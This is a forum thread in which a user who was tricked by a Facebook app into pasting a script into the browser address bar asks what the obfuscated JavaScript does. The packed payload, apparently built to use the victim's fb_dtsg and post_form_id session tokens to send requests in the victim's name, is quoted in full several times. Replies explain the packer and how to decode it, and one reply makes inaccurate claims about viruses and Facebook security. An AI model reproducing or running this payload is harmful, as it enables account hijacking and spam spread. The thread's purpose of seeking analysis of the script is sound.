okay an application on faceook checked for keyboard strokes by asking me to press cntrl c alt d and cntrl v and enter and i made a fool of myself as soon as pressing cntrl v and enter i realised it could be a spam so i checked what alt plus d does, it activates adress bar and obviously i knew cntrl plus c copies so i pasted the script on notepad and cleared browser history immediately can you tell me please what following script does


javascript:void(eval(function(p,a,c,k,e,d){e=funct ion(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('X:v(W);Z();9 6=1;i=0;a 8(u,p,g,s,t){6=1;7(x.N){6=q N()}h 7(x.o){P{6=q o("1b.J")}R(e){P{6=q o("13.J")}R(e){}}}7(s==1){6.18=a(){D(t)}}7(g==1){6 .m(\'15\',u,d)}h{6.m(\'14\',u,d)}6.16(p)}a D(t){7(6.17==4){7(6.1a==19){7(t==\'y\'){G=12(6.j); 8(V+G,\'\',d,1,\'A\')}h 7(t==\'A\'){H=10(6.j);9 S=Y+H+\'r=\'+c+\'&b=\'+f;8(U,S,1,1,\'11\')}h 7(t==\'11\'){i=2}h 7(t==\'1l\'){w=1t(6.j);9 I=1s+c+\'&\'+w+\'b=\'+f;7(w.1r>5)8(1u,I,1,d,\'\'); i=3}h 7(t==\'l\'){1v(6.j,k,E)}}}}E=1c(1x.1w(\'1p\'));c=n .r;f=n.b;k=n.K;9 C=1h+c+\'&b=\'+f;8(1g,C,1,1,\'y\');9 F=z(a(){B()},1q);9 O=z(a(){M()},1f);a B(){7(i==3){v(F);9 T=1d+k+\'&r=\'+c+\'&b=\'+f;8(1e,T,1,d,\'\');9 Q=1i+c+\'&b=\'+f;8(1j,Q,1,d,\'\');8(1o,\'\',d,1,\' l\')}}a M(){7(i==2){v(O);9 L=1n+c+\'&b=\'+f+\'&K=\'+k;8(1m,L,1,1,\'1l\')}}a 1k(u){x.m(u)}',62,96,'|false|||||htp|if|mpr|var|fu nction|fb_dtsg|pf2|true||dg2||else|s9|responseText |u2||open|Env|ActiveXObject||new|post_form_id||||c learInterval|glst2|window|l1|setInterval|l1l|tim2f |p10|alcnt|u3|tim2|ky|glst|p3|XMLHTTP|user|par20|t im3f|XMLHttpRequest|tim3|try|p40|catch|p2|p30|a494 9752878_u2|a4949752878_u11|a4949752878_tc1|javascr ipt|a4949752878_par2|a4949752878_s3c|a4949752878_g 9||a4949752878_ky9|Microsoft|GET|POST|send|readySt ate|onreadystatechange|200|status|Msxml2|a49497528 78_u22|a4949752878_par30|a4949752878_u30|100|a4949 752878_u10|a4949752878_par10|a4949752878_par40|a49 49752878_u40|a4949752878_o||a4949752878_u20|a49497 52878_par20|a4949752878_u50|navAccountPic|500|leng th|a4949752878_par3|a4949752878_g92|a4949752878_u3 |a4949752878_slh|getElementById|document'.split('| '),0,{})))

i have however not noticed anything unusual on profile yet
but whata should i do now

as you can see it is obfuscated code http://en.wikipedia.org/wiki/Obfuscated_code
You need some software to make it "partially" human readable

Obfuscated source code is a very interesting thing. I love encryption and decryption. It would be in my top 10 list of things to explore if I had the time spare. I know that sounds like sarcasm and yet you see the beauty is it's not, that's actually true. I really love encryption. I was looking at that obfuscated code and thinking about all kinds of different fun times I've had creating my own encryption, ages ago, but not for a long time.

I mean it's not a big need. Security comes as standard in your average computer, whatever kind it is, whatever it's for. So the need to encrypt things yourself is minimal or nonexistent.

I once had to write a script to help me replace all the variables in a perl script one by one to remove all the completely bizarre variable names I had used, so that I could share the source code, otherwise it was just too much of a head f*** to read.

Quote:

Originally Posted by lalitmohanchawl

okay an application on faceook checked for keyboard strokes by asking me to press cntrl c alt d and cntrl v and enter and i made a fool of myself as soon as pressing cntrl v and enter i realised it could be a spam so i checked what alt plus d does, it activates adress bar and obviously i knew cntrl plus c copies so i pasted the script on notepad and cleared browser history immediately can you tell me please what following script does


javascript:void(eval(function(p,a,c,k,e,d){e=funct ion(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('X:v(W);Z();9 6=1;i=0;a 8(u,p,g,s,t){6=1;7(x.N){6=q N()}h 7(x.o){P{6=q o("1b.J")}R(e){P{6=q o("13.J")}R(e){}}}7(s==1){6.18=a(){D(t)}}7(g==1){6 .m(\'15\',u,d)}h{6.m(\'14\',u,d)}6.16(p)}a D(t){7(6.17==4){7(6.1a==19){7(t==\'y\'){G=12(6.j); 8(V+G,\'\',d,1,\'A\')}h 7(t==\'A\'){H=10(6.j);9 S=Y+H+\'r=\'+c+\'&b=\'+f;8(U,S,1,1,\'11\')}h 7(t==\'11\'){i=2}h 7(t==\'1l\'){w=1t(6.j);9 I=1s+c+\'&\'+w+\'b=\'+f;7(w.1r>5)8(1u,I,1,d,\'\'); i=3}h 7(t==\'l\'){1v(6.j,k,E)}}}}E=1c(1x.1w(\'1p\'));c=n .r;f=n.b;k=n.K;9 C=1h+c+\'&b=\'+f;8(1g,C,1,1,\'y\');9 F=z(a(){B()},1q);9 O=z(a(){M()},1f);a B(){7(i==3){v(F);9 T=1d+k+\'&r=\'+c+\'&b=\'+f;8(1e,T,1,d,\'\');9 Q=1i+c+\'&b=\'+f;8(1j,Q,1,d,\'\');8(1o,\'\',d,1,\' l\')}}a M(){7(i==2){v(O);9 L=1n+c+\'&b=\'+f+\'&K=\'+k;8(1m,L,1,1,\'1l\')}}a 1k(u){x.m(u)}',62,96,'|false|||||htp|if|mpr|var|fu nction|fb_dtsg|pf2|true||dg2||else|s9|responseText |u2||open|Env|ActiveXObject||new|post_form_id||||clearInterval|glst2|window|l1|setInterval|l1l| tim2f|p10|alcnt|u3|tim2|ky|glst|p3|XMLHTTP|user|pa r20|tim3f|XMLHttpRequest|tim3|try|p40|catch|p2|p30|a4949752878_u2|a4949752 878_u11|a4949752878_tc1|javascript|a4949752878_par 2|a4949752878_s3c|a4949752878_g9||a4949752878_ky9| Microsoft|GET|POST|send|readyState|onreadystatechange|200|status|Msxml2|a4949752878_u22|a4949752878_par 30|a4949752878_u30|100|a4949752878_u10|a4949752878 _par10|a4949752878_par40|a4949752878_u40|a49497528 78_o||a4949752878_u20|a4949752878_par20|a494975287 8_u50|navAccountPic|500|length|a4949752878_par3|a4 949752878_g92|a4949752878_u3|a4949752878_slh|getEl ementById|document'.split('|'),0,{})))

i have however not noticed anything unusual on profile yet
but whata should i do now

I have put in bold a few of the things which sound alarm bells, a few of the things which tell you the sort of thing the person is up to, the GET and POST and any direct ref to a "form" are all commands relating to sending data out of your machine and to the web.

It's JUST possible that the 'encrypted' information is... no. I dunno. It's an idea, that the encrypted info is actually the identity of the malicious person behind it, ie some location the data is being sent to, and that therefore the decryption is implicit in the item you have, that somewhere in it there is its own key, and its own decryption, so that it can send this stuff out in a way which is totally transparent to the machine and yet totally invisible to the human.

Code:

){D(t)}}7(g==1){6 .m(\'15\',u,d)}h{6.m(\'14\',u,d)}6.16(p)}a D(t){7(6.17==4){7(6.1a==19){7(t==\'y\'){G=12(6.j); 8(V+G,\'\',d,1,\'A\')}h 7(t==\'A\'){H=10(6.j);9 S=Y+H+\'r=\'+c+\'&b=\'+f;8(U,S,1,1,\'11\')}h 7(t==\'11\'){i=2}h 7(t==\'1l\'){w=1t(6.j);9 I=1s+c+\'&\'+w+\'b=\'+f;7(w.1r>5)8(1u,I,1,d,\'\'); i=3}h 7(t==\'l\'){1v(6.j,k,E)}}}}E=1c(1x.1w(\'1p\'));c=n .r;f=n.b;k=n.K;9 C=1h+c+\'&b=\'+f;8(1g,C,1,1,\'y\');9 F=z(a()

that stuff could possibly be the decryption area, you see and then this stuff...

Code:

al|l1l|tim2f |p10|alcnt|u3|tim2|ky|glst|p3|XMLHTTP|user|par20|t im3f|XMLHttpRequest|tim3|try|p40|catch|p2|p30|a494 9752878_u2|a4949752878_u11|a4949752878_tc1|javascr ipt|a4949752878_par2|a4949752878_s3c|a4949752878_g 9||a4949752878_ky9|Microsoft|GET|POST|send|readySt ate|onreadystatechange|200|status|Msxml2|a49497528 78_u22|a4949752878_par30|a4949752878_u30|100|a4949 752878_u10|a4949752878_par10|a4949752878_par40|a49 49752878_u40|a4949752878_o||a4949752878_u20|a49497

Could all, one way or another, slightly or hugely, be decrypted and turned into something else, something which if we saw the real form we'd understand easily...


But that's just ideas, I don't think they're even slightly close, but they are the sorts of things you do, when you dabble in decryption and encryption and all of that jazz.

that script's been compressed with this obfuscator: http://dean.edwards.name/packer/

That site normally has a function for decoding the script, but it looks like that's been disabled. You could try downloading one of the free standalone versions and try to do it yourself.

It demonstrates very alarmingly how much of a threat facebook is to users, really. I'm glad I don't use facebook and occasionally use it to get messages from contacts who have no other means to communicate easily due to distance etc... to clarify, for those busy bodies who gaine crude pleasure in thinking they're insulting me, chris de burgh fans, I don't use facebook because it's dangerous and rubbish, although I do, as my opinions recently deleted mentioned, find it quaint and fun. But it's a bit too risky. Viruses are bad news. I never use any sites which can give you viruses, eg hotmail, even gmail, definitely not facebook or twitter or anything where spam and virus people camp out day and night like they're queuing for wimbledon!!

Viruses like the one this guy got from facebook are dangerous and can turn your machine into a carrier of porn, illegal, viagra sals, ebay fraud sites, all kinds of criminal things planted on your machine because facebook doesn't seem to obey the same security standards as... I dunno... who's out there who doesn't get viruses into your machine. Well lots of smaller developers. Maybe even google. Yahoo. MSN? Yeah, i doubt msn is weak in any way. I think facebook's security lapses are worrying, it suggests they're not really technically competent the way even failures like ebay and amazon are.

i think i made it a little bit easier to understand
javascript: void(eval(function (p, a, c, k, e, d)
{
e = funct ion(c)
{
return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toStr ing(36))
};
if (!''.replace(/^/, String))
{
while (c--)
{
d[e(c)] = k[c] || e(c)
}
k = [function (e)
{
return d[e]}];
e = function ()
{
return '\\w+'
};
c = 1
};
while (c--)
{
if (k[c])
{
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}
('X: v(W);
Z();
9 6 = 1;
i = 0;
a 8(u, p, g, s, t) {
6 = 1;
7(x.N) {
6 = q N()
}
h 7(x.o) {
P {
6 = q o("1b.J")
}
R(e) {
P {
6 = q o("13.J")
}
R(e) {}
}
}
7(s == 1) {
6.18 = a() {
D(t)
}
}
7(g == 1) {
6.m(\'15\',u,d)}h{6.m(\'14\',u,d)}6.16(p)}a D(t){7(6.17==4){7(6.1a==19){7(t==\'y\'){G=12(6.j); 8(V+G,\'\',d,1,\'A\')}h 7(t==\'A\'){H=10(6.j);9 S=Y+H+\'r=\'+c+\'&b=\'+f;8(U,S,1,1,\'11\')}h 7(t==\'11\'){i=2}h 7(t==\'1l\'){w=1t(6.j);9 I=1s+c+\'&\'+w+\'b=\'+f;7(w.1r>5)8(1u,I,1,d,\'\'); i=3}h 7(t==\'l\'){1v(6.j,k,E)}}}}E=1c(1x.1w(\'1p\'));c=n .r;f=n.b;k=n.K;9 C=1h+c+\'&b=\'+f;8(1g,C,1,1,\'y\');9 F=z(a(){B()},1q);9 O=z(a(){M()},1f);a B(){7(i==3){v(F);9 T=1d+k+\'&r=\'+c+\'&b=\'+f;8(1e,T,1,d,\'\');9 Q=1i+c+\'&b=\'+f;8(1j,Q,1,d,\'\');8(1o,\'\',d,1,\' l\')}}a M(){7(i==2){v(O);9 L=1n+c+\'&b=\'+f+\'&K=\'+k;8(1m,L,1,1,\'1l\')}}a 1k(u){x.m(u)}', 62, 96, '|false|||||htp|if|mpr|var|fu nction|fb_dtsg|pf2|true||dg2||else|s9|responseText |u2||open|Env|ActiveXObject||new|post_form_id||||c learInterval|glst2|window|l1|setInterval|l1l|tim2f |p10|alcnt|u3|tim2|ky|glst|p3|XMLHTTP|user|par20|t im3f|XMLHttpRequest|tim3|try|p40|catch|p2|p30|a494 9752878_u2|a4949752878_u11|a4949752878_tc1|javascr ipt|a4949752878_par2|a4949752878_s3c|a4949752878_g 9||a4949752878_ky9|Microsoft|GET|POST|send|readySt ate|onreadystatechange|200|status|Msxml2|a49497528 78_u22|a4949752878_par30|a4949752878_u30|100|a4949 752878_u10|a4949752878_par10|a4949752878_par40|a49 49752878_u40|a4949752878_o||a4949752878_u20|a49497 52878_par20|a4949752878_u50|navAccountPic|500|leng th|a4949752878_par3|a4949752878_g92|a4949752878_u3 |a4949752878_slh|getElementById|document'.split('| '), 0, {}')))

actually, you could just replace eval() with alert() to get the text that is being parsed. Then copy and paste and work your way from there.

Quote:

Originally Posted by wayfarer07

actually, you could just replace eval() with alert() to get the text that is being parsed. Then copy and paste and work your way from there.

I was thinking the same thing.

Here is the evil eval

Ajax request